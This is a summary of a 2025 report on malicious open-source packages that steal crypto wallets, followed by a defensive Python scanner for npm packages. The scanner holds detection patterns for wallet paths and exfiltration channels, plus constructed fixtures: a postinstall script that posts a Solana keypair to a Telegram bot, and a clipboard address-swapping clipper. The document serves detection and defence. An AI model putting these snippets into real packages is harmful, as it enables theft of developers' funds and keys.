2025 Blockchain and Cryptocurrency Threat Report: Malware in the Open Source Supply Chain

Malicious open source packages targeting blockchain developers are increasingly used to steal cryptowallet credentials, drain funds, mine cryptocurrency, and hijack clipboard data. Threat actors, including nation-state groups, exploit supply chain vulnerabilities in registries like npm and PyPI, impacting ecosystems such as Ethereum, Solana, TRON, and TON. #ContagiousInterview #BeaverTail #InvisibleFerret #XMRig #ClipboardHijackers

Key points

  • 75% of the malicious blockchain-related packages are hosted on npm; the rest are on PyPI and other registries. Together they target multiple blockchain platforms, including Ethereum, Solana, TRON, and TON.
  • Four main threat classes dominate: Credential Stealers, Crypto Drainers, Cryptojackers, and Clipboard Hijackers (Clippers), each exploiting developer environments and CI/CD pipelines.
  • Credential Stealers extract seed phrases and private keys using techniques like filesystem scraping, browser profile harvesting, and embedding exfiltration in package lifecycle scripts.
  • Nation-state actors, notably linked to North Korea’s Contagious Interview campaign, use supply chain attacks with malware like BeaverTail and InvisibleFerret to steal millions in cryptocurrency.
  • Crypto Drainers immediately initiate on-chain transfers to siphon funds using obfuscated and probabilistic logic, often preserving small wallet balances to avoid detection.
  • Cryptojackers covertly hijack CPU/GPU resources within open source packages to mine cryptocurrency, exemplified by attacks on @rspack/core and klow packages.
  • Clipboard Hijackers continuously monitor and replace cryptocurrency wallet addresses on clipboards to redirect funds, evading detection through simple yet effective techniques.

MITRE Techniques

  • [T1056] Input Capture – Clipboard hijackers monitor and replace cryptocurrency wallet addresses in real time by polling system clipboards (“…continuously polls the system clipboard, applying regex patterns to identify wallet address formats…”).
  • [T1005] Data from Local System – Credential stealers scan wallet paths and browser profiles to extract sensitive files and credentials (“Stealer packages scan known wallet paths… and exfiltrate files without modification”).
  • [T1071] Application Layer Protocol – Malware exfiltrates stolen data using HTTP POST requests and messaging APIs like Telegram bots and Discord webhooks (“exfiltrating credentials via silent HTTP POST”, “embedding exfiltration logic via Telegram bots, Discord webhooks…”).
  • [T1197] BITS Jobs – Persistence is maintained through scheduled tasks and startup entries across multiple OSes (“Persistence is established via scheduled tasks or startup entries”).
  • [T1486] Data Encrypted for Impact – Credential stealers encrypt stolen private keys with hardcoded RSA-2048 keys before exfiltration (“captured the private key, encrypted it with a hardcoded RSA-2048 public key…”).
  • [T1114] Email Collection – Exfiltration through Gmail SMTP servers is used by some credential stealers (“exfiltrate credentials via Gmail”).
  • [T1204] User Execution – Social engineering techniques trick developers into installing malicious packages disguised as coding challenges (“impersonate recruiters and initiate staged interview processes to socially engineer targets”).
  • [T1059] Command and Scripting Interpreter – Malicious lifecycle scripts like postinstall and setup.py execute malware immediately upon package installation (“abuse package lifecycle hooks (postinstall in npm, setup.py in PyPI) to trigger credential theft immediately upon installation”).

Indicators of Compromise

  • [File Hashes] Examples of malicious package versions – @rspack/core and @rspack/cli v1.1.7 compromised with XMRig miner logic, ultralytics v8.3.41–8.3.46 injected with cryptomining payloads.
  • [Domains] C2 and exfiltration endpoints – cl1p[.]net used by PyPI package lsjglsjdv for clipboard exfiltration, public RPC endpoints like bsc-dataseed1.defibit.io and api.devnet.solana.com used for blockchain interactions.
  • [File Names/Paths] Targeted wallet files and directories – ~/.config/solana/id.json, ~/.ledger-live, ~/Library/Application Support/Exodus/exodus.wallet, and browser extension folders for MetaMask, Phantom, Binance Wallet, Coinbase Wallet.
  • [Package Names] Malicious or trojanized packages – monkey-patched PyPI libraries stealing Solana id.json, npm packages such as [email protected], multicogs, [email protected], solana-web3.js variants with credential theft.
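The MITRE list above describes the stealer and clipper behaviours (lifecycle-hook execution, wallet-path scraping, exfiltration over Telegram, Discord, Gmail SMTP, and clipboard polling with address regexes), and the IoC list names the wallet artifacts. The following static scan ties the two together as a defender-side check over an unpacked npm package. It is an added example, not code from the Socket report or from socket.dev tooling; the package names, file contents, and the `<TOKEN>` placeholder in the samples are constructed for the demo, and the "Local Extension Settings" folder name is added here as the Chrome profile location for extension storage rather than taken from the report.

```python
"""Static indicator scan for an unpacked npm package (added example).

Not code from the Socket report or from socket.dev tooling. It flags the
indicators the report describes: install-time lifecycle hooks, reads of the
wallet artifacts listed under IoCs, clipboard polling paired with a
wallet-address regex (the Clipper signature), and exfiltration channels
(Telegram bot API, Discord webhooks, cl1p.net, Gmail SMTP). Package names
and file contents at the bottom are constructed for the demo.
"""
import json
import re

# Wallet artifacts from the report's IoC list. "Local Extension Settings" is the
# Chrome profile folder holding extension storage (MetaMask, Phantom, ...); it is
# an assumption added here, not a path quoted by the report.
WALLET_PATHS = (
    ".config/solana/id.json",
    ".ledger-live",
    "Library/Application Support/Exodus/exodus.wallet",
    "Local Extension Settings",
)

# Exfiltration channels named in the report (Telegram, Discord, cl1p.net, Gmail SMTP).
EXFIL_PATTERNS = {
    "telegram-bot-api": re.compile(r"api\.telegram\.org/bot"),
    "discord-webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/"),
    "cl1p-paste": re.compile(r"cl1p\.net"),
    "gmail-smtp": re.compile(r"smtp\.gmail\.com"),
}

# Clipper heuristic: a clipboard API, a polling loop, and a regex literal whose
# character class is followed by {40} (EVM) or {32,44} (Solana base58), all in one package.
CLIPBOARD_API = re.compile(r"clipboardy|pbpaste|xclip|clipboard\.(?:read|write)(?:Sync)?")
POLL_LOOP = re.compile(r"\bsetInterval\b")
ADDRESS_CLASS = re.compile(r"\[[^\]]*0-9[^\]]*\]\{(?:40|32,44)\}")

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SOURCE_EXT = (".js", ".mjs", ".cjs")


def scan_package(files):
    """files maps a relative path inside the unpacked package to its text content."""
    labels = []
    manifest = json.loads(files.get("package.json", "{}"))
    hooks = [(h, c) for h, c in manifest.get("scripts", {}).items() if h in LIFECYCLE_HOOKS]
    if hooks:
        labels.append("lifecycle-hook")
    source = "\n".join(t for p, t in files.items() if p.endswith(SOURCE_EXT))
    wallet_hits = [p for p in WALLET_PATHS if p in source]
    if wallet_hits:
        labels.append("wallet-path-access")
    exfil_hits = [n for n, rx in EXFIL_PATTERNS.items() if rx.search(source)]
    if exfil_hits:
        labels.append("exfil-channel")
    if CLIPBOARD_API.search(source) and POLL_LOOP.search(source) and ADDRESS_CLASS.search(source):
        labels.append("clipper")
    # A hook alone is common in benign packages; it becomes suspicious when paired
    # with wallet or exfiltration indicators. A clipper signature is suspicious alone.
    if "clipper" in labels or len(labels) >= 2:
        verdict = "suspicious"
    elif labels:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "labels": labels, "hooks": hooks,
            "wallet_paths": wallet_hits, "exfil": exfil_hits}


# Constructed sample mirroring the stealer pattern: postinstall hook reads the Solana
# keypair and posts it to a Telegram bot endpoint (<TOKEN> is a placeholder).
STEALER_SAMPLE = {
    "package.json": json.dumps({"name": "example-stealer-sample", "version": "1.0.0",
                                "scripts": {"postinstall": "node lib/setup.js"}}),
    "lib/setup.js": (
        "const fs = require('fs');\nconst os = require('os');\n"
        "const key = fs.readFileSync(os.homedir() + '/.config/solana/id.json');\n"
        "fetch('https://api.telegram.org/bot<TOKEN>/sendDocument', {method: 'POST', body: key});\n"
    ),
}

# Constructed sample mirroring the clipper pattern described in the report.
CLIPPER_SAMPLE = {
    "package.json": json.dumps({"name": "example-clipper-sample", "version": "0.1.0",
                                "scripts": {"test": "jest"}}),
    "index.js": (
        "const clipboard = require('clipboardy');\nconst evm = /0x[a-fA-F0-9]{40}/;\n"
        "setInterval(() => { const v = clipboard.readSync(); "
        "if (evm.test(v)) clipboard.writeSync(REPLACEMENT); }, 500);\n"
    ),
}

# Constructed benign sample: no lifecycle hook, no wallet or exfil references.
BENIGN_SAMPLE = {
    "package.json": json.dumps({"name": "example-benign-sample", "version": "2.0.0",
                                "scripts": {"build": "tsc", "test": "node test.js"}}),
    "index.js": "module.exports = (a, b) => a + b;\n",
}

if __name__ == "__main__":
    for name, pkg in (("stealer", STEALER_SAMPLE), ("clipper", CLIPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_package(pkg))
```

The scan is deliberately a pre-install gate: run it over the extracted tarball before `npm install` executes any hook, since the report's point is that the hook itself is the trigger. A `review` verdict on a package with a lone `prepare` or `postinstall` script is expected noise; the `suspicious` verdict requires either the clipper trio or a hook combined with a wallet-path or exfiltration indicator.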

Read more: https://socket.dev/blog/2025-blockchain-and-cryptocurrency-threat-report